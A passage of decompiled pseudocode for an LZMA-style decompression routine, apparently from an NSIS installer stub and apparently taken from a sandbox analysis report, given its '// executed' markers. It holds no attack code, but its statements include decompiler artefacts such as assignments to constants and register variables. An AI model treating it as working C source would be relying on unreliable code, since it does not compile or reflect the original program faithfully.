							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
